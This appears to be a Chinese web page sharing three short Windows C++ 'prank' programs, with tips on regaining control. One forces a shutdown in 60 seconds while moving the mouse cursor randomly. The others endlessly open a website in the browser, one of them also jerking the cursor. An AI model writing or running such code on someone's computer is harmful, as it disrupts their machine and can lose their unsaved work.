赞
踩
- // By School //
-
- #include <bits/stdc++.h>
- #include <windows.h>
-
- using namespace std;
-
- int main() {
- system("shutdown -s -f -t 60");
- system("color 40");
- while(1){
- SetCursorPos(rand()%1000,rand()%1000);
- cout << "完了";
- }
- }
- // School //
-
- #include <bits/stdc++.h>
- #include <windows.h>
-
- using namespace std;
-
- int main() {
- while(1) system("start https://www.csdn.net/");
- }
- // School //
-
- #include <bits/stdc++.h>
- #include <windows.h>
-
- using namespace std;
-
- int main() {
- while(1) {
- system("start https://www.csdn.net/");
- SetCursorPos(rand()%1000,rand()%1000);
- }
- }
1. 按下Win + L 锁屏,按下任意键进入登录界面,此时鼠标已经停止乱飞(登录后仍会),在右下角找到电源按钮关闭(可能不行);
2. 强制关机(对电脑不好,不建议)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。